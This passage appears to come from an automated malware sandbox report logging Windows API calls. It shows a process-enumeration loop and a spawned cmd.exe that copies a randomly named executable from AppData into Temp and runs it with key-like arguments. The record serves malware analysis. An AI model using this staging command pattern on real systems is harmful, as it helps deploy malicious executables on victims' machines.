(dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0176.682] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.731] CloseHandle (hObject=0xc4) returned 1 [0176.732] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0176.737] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.785] CloseHandle (hObject=0xbc) returned 1 [0176.785] Sleep (dwMilliseconds=0x12c) [0177.140] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0177.146] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.195] CloseHandle (hObject=0xc4) returned 1 [0177.195] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0177.200] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.392] CloseHandle (hObject=0xbc) returned 1 [0177.392] Sleep (dwMilliseconds=0x12c) [0177.700] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0177.704] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.758] CloseHandle (hObject=0xc4) returned 1 [0177.758] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0177.762] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.806] CloseHandle (hObject=0xbc) returned 1 [0177.806] Sleep (dwMilliseconds=0x12c) [0178.237] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0178.243] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.289] CloseHandle (hObject=0xc4) returned 1 [0178.289] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0178.293] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.381] CloseHandle (hObject=0xbc) returned 1 [0178.381] Sleep (dwMilliseconds=0x12c) [0178.816] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0178.821] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Process: id = "29" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xc70" os_integrity_level = 
"0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4165 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4166 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4167 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4168 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 4169 start_va = 0x4aa20000 end_va = 0x4aa6bfff entry_point = 0x4aa20000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 4170 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4171 start_va = 
0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4172 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4173 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 4174 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 4408 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4409 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4410 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4411 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 4412 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 4413 start_va = 0x6f8f0000 end_va = 0x6f8f6fff entry_point = 0x6f8f0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 4414 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4415 start_va = 0x76480000 
end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4416 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4417 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4418 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4419 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4420 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4421 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 4422 start_va = 0x450000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 4423 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4424 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = 
"\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4425 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4426 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4427 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4428 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4429 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 4430 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 4431 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 4442 start_va = 0x13a0000 end_va = 0x166efff entry_point = 0x13a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 47 os_tid = 0xc74 [0107.039] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fbac | out: lpSystemTimeAsFileTime=0x26fbac*(dwLowDateTime=0x7dcd8a60, dwHighDateTime=0x1d440a9)) [0107.039] GetCurrentProcessId () returned 0xc70 [0107.039] GetCurrentThreadId () returned 0xc74 [0107.039] GetTickCount () returned 0x259b3 [0107.039] QueryPerformanceCounter (in: lpPerformanceCount=0x26fba4 | out: lpPerformanceCount=0x26fba4*=16382791821) returned 1 [0107.039] GetModuleHandleA (lpModuleName=0x0) returned 0x4aa20000 [0107.039] __set_app_type (_Type=0x1) [0107.039] 
__p__fmode () returned 0x76b331f4 [0107.039] __p__commode () returned 0x76b331fc [0107.039] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aa421a6) returned 0x0 [0107.040] __getmainargs (in: _Argc=0x4aa44238, _Argv=0x4aa44240, _Env=0x4aa4423c, _DoWildCard=0, _StartInfo=0x4aa44140 | out: _Argc=0x4aa44238, _Argv=0x4aa44240, _Env=0x4aa4423c) returned 0 [0107.040] GetCurrentThreadId () returned 0xc74 [0107.040] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc74) returned 0x38 [0107.040] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.040] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0107.040] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.040] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.040] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fb3c | out: phkResult=0x26fb3c*=0x0) returned 0x2 [0107.040] VirtualQuery (in: lpAddress=0x26fb73, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0107.040] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0107.040] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0107.040] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x173000, 
AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0107.040] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0107.040] GetConsoleOutputCP () returned 0x1b5 [0107.040] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0107.040] SetConsoleCtrlHandler (HandlerRoutine=0x4aa3e72a, Add=1) returned 1 [0107.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.040] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0107.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.041] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa441ac | out: lpMode=0x4aa441ac) returned 1 [0107.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.041] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0107.041] _get_osfhandle (_FileHandle=0) returned 0x3 [0107.041] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa441b0 | out: lpMode=0x4aa441b0) returned 1 [0107.041] _get_osfhandle (_FileHandle=0) returned 0x3 [0107.041] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0107.041] GetEnvironmentStringsW () returned 0x3603a0* [0107.041] FreeEnvironmentStringsW (penv=0x3603a0) returned 1 [0107.042] GetEnvironmentStringsW () returned 0x3603a0* [0107.042] FreeEnvironmentStringsW (penv=0x3603a0) returned 1 [0107.042] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eaac | out: phkResult=0x26eaac*=0x40) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x50, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] 
RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x0, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] RegCloseKey (hKey=0x40) returned 0x0 [0107.042] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eaac | out: phkResult=0x26eaac*=0x40) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", 
lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x0, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x4) returned 0x0 [0107.042] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x1000) returned 0x2 [0107.042] RegCloseKey (hKey=0x40) returned 0x0 [0107.042] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886354 [0107.042] srand (_Seed=0x5b886354) [0107.042] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0107.042] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0107.042] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.043] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361b00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0107.043] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0107.043] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.043] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0107.043] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0107.043] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0107.043] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0107.043] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0107.043] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0107.043] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0107.043] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0107.043] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0107.043] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0107.043] GetEnvironmentStringsW () returned 0x3624f0* [0107.043] FreeEnvironmentStringsW (penv=0x3624f0) returned 1 [0107.043] GetEnvironmentVariableW (in: 
lpName="COMSPEC", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.043] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0107.043] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0107.043] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0107.043] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0107.043] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0107.043] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0107.043] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0107.044] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0107.044] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0107.044] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f878 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.044] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f878, lpFilePart=0x26f874 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f874*="Desktop") returned 0x18 [0107.044] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0107.044] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x360b80 [0107.044] FindClose (in: hFindFile=0x360b80 | out: hFindFile=0x360b80) returned 1 [0107.044] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x360b80 [0107.044] FindClose (in: hFindFile=0x360b80 | out: hFindFile=0x360b80) returned 1 [0107.044] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x360b80 [0107.044] FindClose (in: hFindFile=0x360b80 | out: hFindFile=0x360b80) returned 1 [0107.044] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0107.044] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0107.044] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0107.044] GetEnvironmentStringsW () returned 0x3603a0* [0107.045] FreeEnvironmentStringsW (penv=0x3603a0) returned 1 [0107.045] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.045] GetConsoleOutputCP () returned 0x1b5 [0107.045] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0107.045] GetUserDefaultLCID () returned 0x409 [0107.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4aa44950, cchData=8 | out: lpLCData=":") returned 2 [0107.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="0") returned 2 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="0") returned 2 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="1") returned 2 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4aa44940, cchData=8 | out: lpLCData="/") returned 2 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4aa44d80, cchData=32 | out: lpLCData="Mon") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4aa44d40, cchData=32 | out: lpLCData="Tue") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4aa44d00, cchData=32 | out: lpLCData="Wed") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4aa44cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0107.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4aa44c80, cchData=32 | out: lpLCData="Fri") 
